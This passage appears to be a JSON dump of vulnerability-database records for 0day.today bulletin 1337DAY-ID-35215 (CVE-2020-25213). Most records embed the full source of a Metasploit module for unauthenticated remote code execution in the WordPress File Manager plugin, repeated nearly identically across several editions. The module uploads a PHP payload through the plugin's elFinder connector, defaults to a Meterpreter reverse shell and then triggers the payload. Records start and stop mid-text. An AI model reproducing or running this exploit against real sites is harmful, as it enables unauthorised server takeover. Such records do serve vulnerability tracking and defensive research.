'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-29] #", "category": "", "verified": false}, "lastseen": "2021-09-28T22:23:53", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "04dd6a69102a463880dbe3821282919c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-29T22:47:07", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-30] #", "category": "", "verified": false}, "lastseen": "2021-09-29T22:47:07", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "e8c2f979759da9db96be8c0bac9511b4", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-30T22:21:21", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-01] #", "category": "", "verified": false}, "lastseen": "2021-09-30T22:21:21", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a73c099168531db9bd78549ae349fd50", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-01T22:41:15", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-02] #", "category": "", "verified": false}, "lastseen": "2021-10-01T22:41:15", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "e7be5fa71564c5d9a35dea1e27964f7b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-03T00:12:45", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; 